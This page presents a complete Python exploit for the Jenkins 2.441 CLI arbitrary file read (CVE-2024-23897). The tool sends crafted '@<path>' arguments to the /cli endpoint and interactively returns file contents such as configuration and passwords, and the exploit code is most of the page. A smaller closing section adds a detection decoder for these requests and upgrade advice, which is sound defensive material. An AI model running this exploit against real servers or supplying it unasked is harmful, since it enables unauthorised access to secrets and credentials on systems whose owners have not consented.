This exploit targets a local file inclusion vulnerability in Jenkins 2.441 (CVE-2024-23897) that allows an attacker to read arbitrary files from the target server. By sending specially crafted HTTP requests, an attacker can use the vulnerability to read sensitive files such as system configuration, passwords, or other sensitive information. The exploit provides an interactive command-line interface that lets the attacker specify the path of the file to read and receive its contents.
😔 The exploit is written in Python and requires the `requests` and `argparse` libraries.
🧐 The exploit targets Jenkins 2.441 running on Debian 12 (Bookworm).
😱 Through this vulnerability an attacker can obtain sensitive information such as system configuration, passwords, or other sensitive data, posing a serious security threat to the target system.
😭 Updating Jenkins promptly to a fixed version is recommended.
```python
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897

from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall


class Exploit(Thread):
    """Background thread that holds the 'download' side of the CLI session open
    while the 'upload' side carries the request; the two halves are paired by
    the Session header."""

    def __init__(self, url: str, identifier: str):
        Thread.__init__(self)
        self.daemon = True
        self.url = url
        self.params = {"remoting": "false"}
        self.identifier = identifier
        self.stop_thread = False
        self.listen = False

    def run(self):
        while not self.stop_thread:
            if self.listen:
                self.listen_and_print()

    def stop(self):
        self.stop_thread = True

    def receive_next_message(self):
        self.listen = True

    def wait_for_message(self):
        while self.listen:
            sleep(0.5)

    def print_formatted_output(self, output: str):
        if "ERROR: No such file" in output:
            print("File not found.")
        elif "ERROR: Failed to parse" in output:
            print("Could not read file.")

        # Each line of the expanded file is echoed back inside this error
        # message, which is where the file content leaks from.
        expression = "No such agent \"(.*)\" exists."
        results = findall(expression, output)
        print("\n".join(results))

    def listen_and_print(self):
        session = Session()
        headers = {"Side": "download", "Session": self.identifier}

        try:
            response = session.post(self.url, params=self.params, headers=headers)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to target to setup the listener.")
            exit(1)

        self.print_formatted_output(response.text)
        self.listen = False

    def send_file_request(self, filepath: str):
        headers = {"Side": "upload", "Session": self.identifier}
        payload = get_payload(filepath)

        try:
            post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to the target to send the request.")
            exit(1)

    def read_file(self, filepath: str):
        self.receive_next_message()
        sleep(0.1)
        self.send_file_request(filepath)
        self.wait_for_message()


def get_payload_message(operation_index: int, text: str) -> bytes:
    """Frame one CLI operation: 4-byte length, 1-byte opcode, then the text as
    a 2-byte length followed by UTF-8 bytes. The byte order is spelled out so
    the code also runs on Python versions before 3.11, where to_bytes() has no
    default."""
    text_bytes = bytes(text, "utf-8")
    text_size = len(text_bytes)
    text_message = text_size.to_bytes(2, "big") + text_bytes
    message_size = len(text_message)
    payload = message_size.to_bytes(4, "big") + operation_index.to_bytes(1, "big") + text_message
    return payload


def get_payload(filepath: str) -> bytes:
    # Opcode 0 carries a command-line argument, opcode 3 starts the command.
    # The "@<path>" argument is what the args4j parser expands from a file.
    arg_operation = 0
    start_operation = 3
    command = get_payload_message(arg_operation, "connect-node")
    poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")
    payload = command + poisoned_argument + start_operation.to_bytes(1, "big")
    return payload


def start_interactive_file_read(exploit: Exploit):
    print("Press Ctrl+C to exit")
    while True:
        filepath = input("File to download:\n> ")
        filepath = make_path_absolute(filepath)
        exploit.receive_next_message()
        try:
            exploit.read_file(filepath)
        except exceptions.ReadTimeout:
            print("Payload request timed out.")


def make_path_absolute(filepath: str) -> str:
    if not filepath.startswith('/'):
        return f"/proc/self/cwd/{filepath}"
    return filepath


def format_target_url(url: str) -> str:
    if url.endswith('/'):
        url = url[:-1]
    return f"{url}/cli"


def get_arguments():
    parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
    parser.add_argument("-u", "--url", required=True,
                        help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")
    parser.add_argument("-p", "--path", help="The absolute path of the file to download")
    return parser.parse_args()


def main():
    args = get_arguments()
    url = format_target_url(args.url)
    filepath = args.path
    identifier = str(uuid4())

    exploit = Exploit(url, identifier)
    exploit.start()

    if filepath:
        filepath = make_path_absolute(filepath)
        exploit.read_file(filepath)
        exploit.stop()
        return

    try:
        start_interactive_file_read(exploit)
    except KeyboardInterrupt:
        pass

    print("\nQuitting")
    exploit.stop()


if __name__ == "__main__":
    main()
```
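The request body the exploit sends is small and regular, which makes it a good place to detect the technique at a reverse proxy or in captured traffic. The decoder below is an added example, written for this page; it is not part of the exploit above and not Jenkins code. It assumes exactly the byte layout the exploit's `get_payload()` produces (4-byte big-endian length, 1-byte opcode, a 2-byte-length-prefixed UTF-8 argument for opcode 0, and the start opcode 3 appended as a bare trailing byte), decodes the arguments of a `POST /cli` upload body, and flags any argument beginning with `@`, which is the args4j file-expansion trigger the vulnerability abuses. The sample bodies are constructed inline for the example; `CliRequest`, `decode_cli_body`, `suspicious_arguments` and `classify_body` are names chosen here, not identifiers from Jenkins.

```python
# Added example: decode the CLI request framing used by the exploit above and
# flag args4j "@<path>" arguments. Not part of the original exploit or Jenkins.
from dataclasses import dataclass, field
from typing import List

OP_ARG = 0    # opcode 0: one command-line argument
OP_START = 3  # opcode 3: run the command


@dataclass
class CliRequest:
    arguments: List[str] = field(default_factory=list)
    started: bool = False
    malformed: bool = False  # set when a frame is truncated or inconsistent


def decode_cli_body(body: bytes) -> CliRequest:
    """Walk the frames of a captured upload body (layout as the exploit emits it)."""
    req = CliRequest()
    pos = 0
    while pos < len(body):
        remaining = len(body) - pos
        # The exploit appends the start opcode as a single byte with no length prefix.
        if remaining == 1 and body[pos] == OP_START:
            req.started = True
            break
        # Anything else needs the 4-byte length and the opcode byte.
        if remaining < 5:
            req.malformed = True
            break
        frame_len = int.from_bytes(body[pos:pos + 4], "big")
        opcode = body[pos + 4]
        payload = body[pos + 5:pos + 5 + frame_len]
        if len(payload) != frame_len:
            req.malformed = True  # truncated frame
            break
        pos += 5 + frame_len
        if opcode == OP_ARG:
            if len(payload) < 2:
                req.malformed = True
                break
            text_len = int.from_bytes(payload[:2], "big")
            text = payload[2:2 + text_len]
            if len(text) != text_len:
                req.malformed = True
                break
            req.arguments.append(text.decode("utf-8", errors="replace"))
        elif opcode == OP_START:
            req.started = True
        # Other opcodes are not produced by the exploit and are skipped here.
    return req


def suspicious_arguments(req: CliRequest) -> List[str]:
    """Arguments that args4j would expand from a file on the server."""
    return [arg for arg in req.arguments if arg.startswith("@")]


def classify_body(body: bytes) -> str:
    """Verdict for a captured POST /cli body with Side: upload."""
    req = decode_cli_body(body)
    if req.malformed:
        return "malformed"
    if suspicious_arguments(req):
        return "file-expansion-attempt"
    return "benign"


# Constructed sample bodies (same layout as get_payload(); paths are made up).
ATTEMPT_BODY = (
    b"\x00\x00\x00\x0e" b"\x00" b"\x00\x0c" b"connect-node"
    + b"\x00\x00\x00\x10" b"\x00" b"\x00\x0e" b"@/etc/hostname"
    + b"\x03"
)
BENIGN_BODY = (
    b"\x00\x00\x00\x0e" b"\x00" b"\x00\x0c" b"connect-node"
    + b"\x00\x00\x00\x0e" b"\x00" b"\x00\x0c" b"build-agent1"
    + b"\x03"
)

if __name__ == "__main__":
    for name, body in (("attempt", ATTEMPT_BODY), ("benign", BENIGN_BODY)):
        req = decode_cli_body(body)
        print(name, classify_body(body), req.arguments, suspicious_arguments(req))
```

A check like this is a compensating control only: the body can be reshaped by a client, so the fix is to upgrade past 2.441 (Jenkins 2.442 and LTS 2.426.3 disable the `@` file expansion in the CLI parser) or to disable CLI access until that is done. Pair the decoder with the request's `Side` and `Session` headers and the `remoting=false` query parameter so that only the upload half of a CLI session is inspected.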